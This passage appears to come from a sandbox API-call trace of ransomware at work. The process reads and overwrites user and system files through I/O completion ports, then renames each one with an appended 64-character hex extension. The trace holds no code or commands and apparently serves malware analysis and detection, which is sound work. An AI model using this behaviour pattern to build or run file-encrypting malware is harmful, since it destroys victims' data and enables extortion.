dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.755] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x28fff70) returned 0x0 [0109.756] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", lpString2=".1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569") returned="\\Device\\HarddiskVolume1\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569" [0109.756] GetProcessHeap () returned 0x600000 [0109.756] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x6f30d0 [0109.756] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x28fff60, FileInformation=0x6f30d0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0109.757] CloseHandle (hObject=0x304) returned 1 [0109.759] GetProcessHeap () returned 0x600000 [0109.759] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.759] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.761] ReadFile (in: hFile=0x314, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0109.761] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.762] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x28fff70) returned 0x0 [0109.763] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Recovery\\WindowsRE\\ReAgent.xml", lpString2=".7E9351C75ABC89171EDCAC2661535183A40101C38DBCA40E308F06AA72F16B45" | out: lpString1="\\Device\\HarddiskVolume1\\Recovery\\WindowsRE\\ReAgent.xml.7E9351C75ABC89171EDCAC2661535183A40101C38DBCA40E308F06AA72F16B45") returned="\\Device\\HarddiskVolume1\\Recovery\\WindowsRE\\ReAgent.xml.7E9351C75ABC89171EDCAC2661535183A40101C38DBCA40E308F06AA72F16B45" [0109.763] GetProcessHeap () returned 0x600000 [0109.763] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x100) returned 0x31634b0 [0109.763] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x28fff60, FileInformation=0x31634b0, Length=0x100, FileInformationClass=0xa) returned 0x0 [0109.763] CloseHandle (hObject=0x314) returned 1 [0109.765] GetProcessHeap () returned 0x600000 [0109.765] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.767] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0110.933] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0110.933] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0110.934] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0110.942] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0110.943] WriteFile (in: hFile=0x308, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0110.944] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.310] ReadFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.328] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x28fff70) returned 0x0 [0111.329] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml", lpString2=".E90F43C6B7BD6398482744171DF3ED365B909AA2D8C7F98FB4C9D32437C17871" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.E90F43C6B7BD6398482744171DF3ED365B909AA2D8C7F98FB4C9D32437C17871") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.E90F43C6B7BD6398482744171DF3ED365B909AA2D8C7F98FB4C9D32437C17871" [0111.329] GetProcessHeap () returned 0x600000 [0111.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x158) returned 0x311b560 [0111.329] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x28fff60, FileInformation=0x311b560, Length=0x158, FileInformationClass=0xa) returned 0x0 [0111.330] CloseHandle (hObject=0x330) returned 1 [0111.340] GetProcessHeap () returned 0x600000 [0111.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0111.341] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.343] ReadFile (in: hFile=0x334, lpBuffer=0x3310430, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0111.343] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.344] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x28fff70) returned 0x0 [0111.345] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml", lpString2=".666578F634783ABEEC6A70C047A32BBB0C2C1BCC22BBE7AB27ABE7D8FC738822" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml.666578F634783ABEEC6A70C047A32BBB0C2C1BCC22BBE7AB27ABE7D8FC738822") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml.666578F634783ABEEC6A70C047A32BBB0C2C1BCC22BBE7AB27ABE7D8FC738822" [0111.345] GetProcessHeap () returned 0x600000 [0111.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15c) returned 0x311b6c0 [0111.345] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x311b6c0, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0111.345] CloseHandle (hObject=0x334) returned 1 [0111.347] GetProcessHeap () returned 0x600000 [0111.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0111.349] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.489] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.494] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.534] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.534] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.534] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.535] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.543] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x28fff70) returned 0x0 [0111.543] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png", lpString2=".3369BED176CDC0AE2865F952AC52784107D9ABD9448F414E613078BB6CF3F32D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.3369BED176CDC0AE2865F952AC52784107D9ABD9448F414E613078BB6CF3F32D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.3369BED176CDC0AE2865F952AC52784107D9ABD9448F414E613078BB6CF3F32D" [0111.543] GetProcessHeap () returned 0x600000 [0111.543] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x6f3d58 [0111.543] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x6f3d58, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0111.545] CloseHandle (hObject=0x334) returned 1 [0111.546] GetProcessHeap () returned 0x600000 [0111.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.548] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.562] ReadFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.562] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.563] WriteFile (in: hFile=0x334, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.563] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.564] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0111.565] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml", lpString2=".A0AD0D3DA8F00B4BD56970D29632AC8F6E8AB990CC68E2083C3517D114921E18" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.A0AD0D3DA8F00B4BD56970D29632AC8F6E8AB990CC68E2083C3517D114921E18") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.A0AD0D3DA8F00B4BD56970D29632AC8F6E8AB990CC68E2083C3517D114921E18" [0111.565] GetProcessHeap () returned 0x600000 [0111.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x6f3ed0 [0111.565] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x6f3ed0, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0111.565] CloseHandle (hObject=0x334) returned 1 [0111.567] GetProcessHeap () returned 0x600000 [0111.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.569] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.573] ReadFile (in: hFile=0x318, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.573] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.598] WriteFile (in: hFile=0x318, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.598] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.600] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0111.600] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll", lpString2=".943D6FB3B1E5CFCDDE88298DAE80FCBF95631CC38F914D48CA5272772BF34D2F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll.943D6FB3B1E5CFCDDE88298DAE80FCBF95631CC38F914D48CA5272772BF34D2F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll.943D6FB3B1E5CFCDDE88298DAE80FCBF95631CC38F914D48CA5272772BF34D2F" [0111.600] GetProcessHeap () returned 0x600000 [0111.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x318ef70 [0111.600] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x318ef70, Length=0x188, FileInformationClass=0xa) returned 0x0 [0111.601] CloseHandle (hObject=0x318) returned 1 [0111.605] GetProcessHeap () returned 0x600000 [0111.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.606] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.750] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.753] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.761] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.761] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.789] ReadFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.789] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.796] ReadFile (in: hFile=0x318, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.796] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.802] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x28fff70) returned 0x0 [0111.803] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll", lpString2=".D4EFA973844E6624F8BB8942AF8CBA161BF4C2A756509A973687397BF5A9A605" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll.D4EFA973844E6624F8BB8942AF8CBA161BF4C2A756509A973687397BF5A9A605") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ETWlog.dll.D4EFA973844E6624F8BB8942AF8CBA161BF4C2A756509A973687397BF5A9A605" [0111.803] GetProcessHeap () returned 0x600000 [0111.803] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x3185df0 [0111.803] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x3185df0, Length=0x162, FileInformationClass=0xa) returned 0x0 [0111.930] CloseHandle (hObject=0x318) returned 1 [0111.967] GetProcessHeap () returned 0x600000 [0111.967] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.969] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0111.979] WriteFile (in: hFile=0x328, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.019] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.353] ReadFile (in: hFile=0x310, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.353] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.353] WriteFile (in: hFile=0x310, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.354] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.356] ReadFile (in: hFile=0x318, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0112.357] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.360] WriteFile (in: hFile=0x318, lpBuffer=0x6a85c8, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 0x0 [0112.361] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.361] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x688540, ReturnLength=0x28fff70) returned 0x0 [0112.362] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll", lpString2=".56EDD5959944B02CE79368B4C8A1AA6CC6F14B4C9BFCC8C2AC7D171007D0945D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll.56EDD5959944B02CE79368B4C8A1AA6CC6F14B4C9BFCC8C2AC7D171007D0945D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll.56EDD5959944B02CE79368B4C8A1AA6CC6F14B4C9BFCC8C2AC7D171007D0945D" [0112.362] 